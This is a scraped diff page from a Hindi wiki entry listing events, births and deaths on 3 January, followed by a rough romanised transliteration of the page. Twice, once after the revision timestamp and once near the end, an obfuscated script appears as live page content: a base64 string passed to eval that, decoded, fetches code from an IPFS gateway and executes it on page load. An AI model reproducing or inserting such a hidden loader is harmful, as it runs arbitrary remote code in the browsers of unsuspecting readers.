Difference between revisions of "3 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "कवियत्री" to "कवयित्री")
Line 4: Line 4:
  
 
==3 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==3 जनवरी की महत्त्वपूर्ण घटनाएँ==
* 1833 - ब्रिटेन ने दक्षिण अटलांटिक के फ़ॉकलैंड द्वीप पर कब्जा जमाया।
+
* 1833 - [[ब्रिटेन]] ने दक्षिण अटलांटिक के फ़ॉकलैंड द्वीप पर कब्जा जमाया।
* [[1894]] - [[रवीन्द्र नाथ टैगोर]] ने [[शांति निकेतन]] में '[[पौष मेला]]' का उद्घाटन किया।
+
* [[1894]] - [[रवीन्द्र नाथ टैगोर]] ने '[[शांति निकेतन]]' में '[[पौष मेला]]' का उद्घाटन किया।
* [[1901]] - [[शांति निकेतन]] में [[ब्रह्मचर्य आश्रम]] खुला।
+
* [[1901]] - '[[शांति निकेतन]]' में [[ब्रह्मचर्य आश्रम]] खुला।
 
* [[1911]] - [[अमेरिका]] में डाक बचत बैंक का उद्घाटन हुआ।
 
* [[1911]] - [[अमेरिका]] में डाक बचत बैंक का उद्घाटन हुआ।
 
* [[1929]] - [[महात्मा गांधी]] [[लॉर्ड इरविन]] से मिले।
 
* [[1929]] - [[महात्मा गांधी]] [[लॉर्ड इरविन]] से मिले।
 
* [[1943]] - [[टेलीविजन]] पर पहली बार गुमशुदा लोगों के बारे में सूचना का प्रसारण किया गया।
 
* [[1943]] - [[टेलीविजन]] पर पहली बार गुमशुदा लोगों के बारे में सूचना का प्रसारण किया गया।
* [[1956]] - [[फ्रांस]] में एफिल टॉवर के ऊपरी हिस्से में आग लगने से नुकसान।
+
* [[1956]] - [[फ्रांस]] में 'एफिल टॉवर' के ऊपरी हिस्से में आग लगने से नुकसान।
 
* [[1957]] - अमेरिका के पेनसिल्वेनिया में पहली बार बिजली घड़ी प्रदर्शित की गयी।
 
* [[1957]] - अमेरिका के पेनसिल्वेनिया में पहली बार बिजली घड़ी प्रदर्शित की गयी।
 
* [[1959]] - अलास्का को अमेरिका का 49वां राज्य घोषित किया गया।
 
* [[1959]] - अलास्का को अमेरिका का 49वां राज्य घोषित किया गया।
* [[1968]] - देश का पहला [[मौसम विज्ञान]] राकेट '[[मेनका]]' का प्रक्षेपण।
+
* [[1968]] - देश के पहले [[मौसम विज्ञान]] रॉकेट '[[मेनका]]' का प्रक्षेपण।
 
* [[1974]] - बर्मा (अब [[म्यांमार]]) में संविधान को अंगीकार किया गया।
 
* [[1974]] - बर्मा (अब [[म्यांमार]]) में संविधान को अंगीकार किया गया।
 
* [[1991]] - इजरायल ने 23 साल बाद सोवियत संघ में वाणिज्य दूतावास को दोबारा खोला।
 
* [[1991]] - इजरायल ने 23 साल बाद सोवियत संघ में वाणिज्य दूतावास को दोबारा खोला।
 
** [[ब्रिटेन]] से इराकी दूतावास के अाठ अधिकारियों को निष्कासित किया गया।
 
** [[ब्रिटेन]] से इराकी दूतावास के अाठ अधिकारियों को निष्कासित किया गया।
* [[1993]] - अमेरिकी राष्ट्रपति जार्ज बुश एवं रूस के राष्ट्रपति बोरिस येल्तसिन द्वारा 'स्टार्ट द्वितीय' संधि पर हस्ताक्षर किया गया।  
+
* [[1993]] - अमेरिकी राष्ट्रपति जार्ज बुश एवं [[रूस]] के राष्ट्रपति बोरिस येल्तसिन द्वारा 'स्टार्ट द्वितीय' संधि पर हस्ताक्षर किया गया।  
 
** [[अमरीका]] और [[रूस]] ने अपने परमाणु हथियारों की संख्या को आधा करने पर सहमति जतायी।
 
** [[अमरीका]] और [[रूस]] ने अपने परमाणु हथियारों की संख्या को आधा करने पर सहमति जतायी।
 
* [[1995]] - [[हरियाणा]] के [[डबवाली]] में एक स्कूल में लगी भीषण आग में 360 लोगों की मौत।
 
* [[1995]] - [[हरियाणा]] के [[डबवाली]] में एक स्कूल में लगी भीषण आग में 360 लोगों की मौत।
 
* [[1998]] - अल्जीरियाई इस्लामी विद्रोह में 412 लोगों की हत्या।  
 
* [[1998]] - अल्जीरियाई इस्लामी विद्रोह में 412 लोगों की हत्या।  
 
* [[2000]] - [[कलकत्ता]] का नाम आधिकारिक रूप से [[कोलकाता]] रखा गया।
 
* [[2000]] - [[कलकत्ता]] का नाम आधिकारिक रूप से [[कोलकाता]] रखा गया।
* [[2002]] - काठमाण्डू में दक्षेस विदेश मंत्रियों की बैठक में पाकिस्तान बेनकाब, भारत ने आतंकवादियों व अपराधियों के ख़िलाफ़ सबूत सार्वजनिक किए।  
+
* [[2002]] - [[काठमाण्डू]] में दक्षेस विदेश मंत्रियों की बैठक में पाकिस्तान बेनकाब, [[भारत]] ने आतंकवादियों व अपराधियों के ख़िलाफ़ सबूत सार्वजनिक किए।  
* [[2004]] - 12वें सार्क सम्मेलन में भाग लेने प्रधानमंत्री अटल बिहारी वाजपेयी इस्लामाबाद पहुँचे।  
+
* [[2004]] - 12वें सार्क सम्मेलन में भाग लेने [[प्रधानमंत्री]] [[अटल बिहारी वाजपेयी]] इस्लामाबाद पहुँचे।  
** मिस्र की विमानन कंपनी फ्लैश एयरलाइंस के बोइंग 737 विमान 604 के दुर्घटनाग्रस्त होने से उसमें सवार सभी 148 लोग मारे गये।
+
** [[मिस्र]] की विमानन कंपनी फ्लैश एयरलाइंस के बोइंग 737 विमान 604 के दुर्घटनाग्रस्त होने से उसमें सवार सभी 148 लोग मारे गये।
* [[2005]] - यूएसए ने तमिलनाडु में सुनामी पीड़ितों को साफ़ पेयजल उपलब्ध कराने के लिए 6.2 करोड़ रुपये की सहायता की घोषणा की।  
+
* [[2005]] - यूएसए ने [[तमिलनाडु]] में [[सुनामी]] पीड़ितों को साफ़ पेयजल उपलब्ध कराने के लिए 6.2 करोड़ रुपये की सहायता की घोषणा की।  
 
* [[2007]] - [[चीन]] की मारग्रेट चान ने [[विश्व स्वास्थ्य संगठन]] के महानिदेशक पद की कमान सम्भाली।  
 
* [[2007]] - [[चीन]] की मारग्रेट चान ने [[विश्व स्वास्थ्य संगठन]] के महानिदेशक पद की कमान सम्भाली।  
* [[2008]] -  
+
* [[2008]] - बिजली उपकरण बनाने वाली 'इंडो एशियन फ्युजगीयर लिमिटेड' ने [[उत्तराखण्ड]] में [[हरिद्वार]] में 40 करोड़ रुपये के निवेश से नया अत्याधुनिक विचारगियर संयंत्र खोलने की घोषणा की।
**बिजली उपकरण इंडो एशियन फ्युजगीयर लिमिटेड ने [[उत्तराखण्ड]] में [[हरिद्वार]] में 40 करोड़ रुपये के निवेश से नया अत्याधुनिक विचारगियर संयंत्र खोलने की घोषणा की।
+
**[[संयुक्त राष्ट्र सुरक्षा परिषद]] की 15 सदस्यीय टीम में लीबिया, वियतनाम, क्रोएशिया, कोस्टारिका और बुर्किनाफासो का पांच नये अस्थायी सदस्यों के रूप में चयन किया गया।  
**संयुक्त राष्ट्र सुरक्षा परिषद की 15 सदस्यीय टीम में लीबिया, वियतनाम, क्रोएशिया, कोस्टारिका और बुर्किनाफासो का पांच नये अस्थायी सदस्यों के रूप में चयन किया गया।  
 
 
* [[2009]] - [[राजस्थान]] के [[मुख्यमंत्री]] [[अशोक गहलोत]] ने सभा में विश्वास मत हासिल किया।
 
* [[2009]] - [[राजस्थान]] के [[मुख्यमंत्री]] [[अशोक गहलोत]] ने सभा में विश्वास मत हासिल किया।
* [[2013]] - इराक के मुसय्यिब क्षेत्र में एक आत्मघाती बम विस्फोट में शिया समुदाय के 27 लोगों की मौत हो गयी और 60 घायल हो गये।
+
* [[2013]] - इराक के मुसय्यिब क्षेत्र में एक आत्मघाती बम विस्फोट में [[शिया|शिया समुदाय]] के 27 लोगों की मौत हो गयी और 60 घायल हो गये।
* [[2015]] - नाइजीरिया के पूवोत्तर शहर बागा में आतंकवादी संगठन बोको हराम का हमला,लगभग 2000 लोगों की मौत।
+
* [[2015]] - नाइजीरिया के पूवोत्तर शहर बागा में आतंकवादी संगठन बोको हराम का हमला, लगभग 2000 लोगों की मौत।
 +
 
 
==3 जनवरी को जन्मे व्यक्ति==
 
==3 जनवरी को जन्मे व्यक्ति==
* 1831 - [[सावित्रीबाई फुले]], सामाजिक कार्यकर्त्ता, [[भारत]] में पहली महिला शिक्षक, और मराठी भाषा में पहली महिला कवयित्री।
+
* [[1981]] - [[नरेश अय्यर]] भारतीय पार्श्वगायक
* 1836 - मुंशी नवल किशोर - [[एशिया]] की सबसे पुरानी प्रिंटिंग प्रेस के संस्थापक का [[उत्तर प्रदेश]] के [[अलीगढ़]]।
+
* [[1977]] -  गुल पनाग - मॉडल, बॉलीवुड [[अभिनेत्री]]
 +
* [[1954]] - [[बागेश्री चक्रधर]] - [[आकाशवाणी]] व [[दूरदर्शन]] की स्वर-परीक्षित एवं मान्यता-प्राप्त कलाकार हैं।
 +
* [[1941]] - संजय खान - [[बॉलीवुड]] [[अभिनेता]]।
 
* [[1938]] - [[जसवंत सिंह]] - प्रसिद्ध भारतीय राजनेता।
 
* [[1938]] - [[जसवंत सिंह]] - प्रसिद्ध भारतीय राजनेता।
* [[1941]] - संजय खान - [[बॉलीवुड]] [[अभिनेता]]।
 
 
* [[1927]] - [[जानकी बल्लभ पटनायक]] -  [[ओडिशा]] के पूर्व [[मुख्यमंत्री]]।
 
* [[1927]] - [[जानकी बल्लभ पटनायक]] -  [[ओडिशा]] के पूर्व [[मुख्यमंत्री]]।
* [[1954]] - [[बागेश्री चक्रधर]] - [[आकाशवाणी]] व [[दूरदर्शन]] की स्वर-परीक्षित एवं मान्यता-प्राप्त कलाकार हैं।
 
* [[1977]] -  गुल पनाग - मॉडल, बॉलीवुड [[अभिनेत्री]]
 
* [[1981]] - [[नरेश अय्यर]] भारतीय पार्श्वगायक
 
 
* [[1915]] - [[चेतन आनंद (निर्देशक)|चेतन आनंद]], प्रसिद्ध फ़िल्म निर्माता-निर्देशक
 
* [[1915]] - [[चेतन आनंद (निर्देशक)|चेतन आनंद]], प्रसिद्ध फ़िल्म निर्माता-निर्देशक
* [[1903]] - [[जयपाल सिंह]] - भारतीय [[हॉकी]] के प्रसिद्ध खिलाड़ियों में से एक।
+
* [[1903]] - [[जयपाल सिंह]] - भारतीय [[हॉकी]] के प्रसिद्ध खिलाड़ियों में से एक
 +
* 1836 - मुंशी नवल किशोर - [[एशिया]] की सबसे पुरानी प्रिंटिंग प्रेस के संस्थापक का [[उत्तर प्रदेश]] के [[अलीगढ़]]।
 +
* 1831 - [[सावित्रीबाई फुले]], सामाजिक कार्यकर्त्ता, [[भारत]] में पहली महिला शिक्षक, और मराठी भाषा में पहली महिला कवयित्री।
 +
 
 
==3 जनवरी को हुए निधन==
 
==3 जनवरी को हुए निधन==
* [[1972]]- [[मोहन राकेश]] [[लेखक]] व [[नाटककार]]
 
 
* [[2002]] - [[सतीश धवन]] - [[भारत]] के प्रसिद्ध रॉकेट वैज्ञानिक।
 
* [[2002]] - [[सतीश धवन]] - [[भारत]] के प्रसिद्ध रॉकेट वैज्ञानिक।
* [[2005]]- जे एन दीक्षित, भारतीय सरकारी अधिकारी।
+
* [[2005]]- जे. एन. दीक्षित, भारतीय सरकारी अधिकारी।
 
* [[2013]] - [[एम. एस. गोपालकृष्णन]] - [[भारत]] के प्रसिद्ध [[वायलिन]] वादक।
 
* [[2013]] - [[एम. एस. गोपालकृष्णन]] - [[भारत]] के प्रसिद्ध [[वायलिन]] वादक।
 
* [[1979]]- [[परशुराम चतुर्वेदी]], विद्वान् शोधकर्मी समीक्षक
 
* [[1979]]- [[परशुराम चतुर्वेदी]], विद्वान् शोधकर्मी समीक्षक
 +
* [[1972]]- [[मोहन राकेश]] [[लेखक]] व [[नाटककार]]
 
* [[1871]] - [[कुरिआकोसी इलिआस चावारा]] - [[केरल]] के सीरियन कैथॉलिक संत तथा समाज सुधारक।
 
* [[1871]] - [[कुरिआकोसी इलिआस चावारा]] - [[केरल]] के सीरियन कैथॉलिक संत तथा समाज सुधारक।
 +
 
==3 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==3 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
* राष्ट्रीय सड़क सुरक्षा सप्ताह।
+
* राष्ट्रीय सड़क सुरक्षा सप्ताह
 +
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
* [http://www.univarta.com/history-of-the-day-02januray/today-in-history/news/736727.html univarta.com]
 
* [http://www.univarta.com/history-of-the-day-02januray/today-in-history/news/736727.html univarta.com]

Revision as of 12:41, 28 July 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 3 janavari varsh ka tisara din hai. sal mean abhi aur 362 din shesh haian. (lip varsh mean 363 din)

3 janavari ki mahattvapoorn ghatanaean

  • 1833 - briten ne dakshin atalaantik ke f aaukalaiand dvip par kabja jamaya.
  • 1894 - ravindr nath taigor ne 'shaanti niketan' mean 'paush mela' ka udghatan kiya.
  • 1901 - 'shaanti niketan' mean brahmachary ashram khula.
  • 1911 - amerika mean dak bachat baiank ka udghatan hua.
  • 1929 - mahatma gaandhi l aaurd iravin se mile.
  • 1943 - telivijan par pahali bar gumashuda logoan ke bare mean soochana ka prasaran kiya gaya.
  • 1956 - phraans mean 'ephil t aauvar' ke oopari hisse mean ag lagane se nukasan.
  • 1957 - amerika ke penasilveniya mean pahali bar bijali gh di pradarshit ki gayi.
  • 1959 - alaska ko amerika ka 49vaan rajy ghoshit kiya gaya.
  • 1968 - desh ke pahale mausam vijnan r aauket 'menaka' ka prakshepan.
  • 1974 - barma (ab myaanmar) mean sanvidhan ko aangikar kiya gaya.
  • 1991 - ijarayal ne 23 sal bad soviyat sangh mean vanijy dootavas ko dobara khola.
    • briten se iraki dootavas ke aath adhikariyoan ko nishkasit kiya gaya.
  • 1993 - ameriki rashtrapati jarj bush evan roos ke rashtrapati boris yeltasin dvara 'start dvitiy' sandhi par hastakshar kiya gaya.
    • amarika aur roos ne apane paramanu hathiyaroan ki sankhya ko adha karane par sahamati jatayi.
  • 1995 - hariyana ke dabavali mean ek skool mean lagi bhishan ag mean 360 logoan ki maut.
  • 1998 - aljiriyaee islami vidroh mean 412 logoan ki hatya.
  • 2000 - kalakatta ka nam adhikarik roop se kolakata rakha gaya.
  • 2002 - kathamandoo mean dakshes videsh mantriyoan ki baithak mean pakistan benakab, bharat ne atankavadiyoan v aparadhiyoan ke khilaf saboot sarvajanik kie.
  • 2004 - 12vean sark sammelan mean bhag lene pradhanamantri atal bihari vajapeyi islamabad pahuanche.
    • misr ki vimanan kanpani phlaish eyaralaians ke boiang 737 viman 604 ke durghatanagrast hone se usamean savar sabhi 148 log mare gaye.
  • 2005 - yooese ne tamilanadu mean sunami pi ditoan ko saf peyajal upalabdh karane ke lie 6.2 karo d rupaye ki sahayata ki ghoshana ki.
  • 2007 - chin ki maragret chan ne vishv svasthy sangathan ke mahanideshak pad ki kaman sambhali.
  • 2008 - bijali upakaran banane vali 'iando eshiyan phyujagiyar limited' ne uttarakhand mean haridvar mean 40 karo d rupaye ke nivesh se naya atyadhunik vicharagiyar sanyantr kholane ki ghoshana ki.
    • sanyukt rashtr suraksha parishad ki 15 sadasyiy tim mean libiya, viyatanam, kroeshiya, kostarika aur burkinaphaso ka paanch naye asthayi sadasyoan ke roop mean chayan kiya gaya.
  • 2009 - rajasthan ke mukhyamantri ashok gahalot ne sabha mean vishvas mat hasil kiya.
  • 2013 - irak ke musayyib kshetr mean ek atmaghati bam visphot mean shiya samuday ke 27 logoan ki maut ho gayi aur 60 ghayal ho gaye.
  • 2015 - naijiriya ke poovottar shahar baga mean atankavadi sangathan boko haram ka hamala, lagabhag 2000 logoan ki maut.

3 janavari ko janme vyakti

3 janavari ko hue nidhan

3 janavari ke mahattvapoorn avasar evan utsav

  • rashtriy s dak suraksha saptah

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh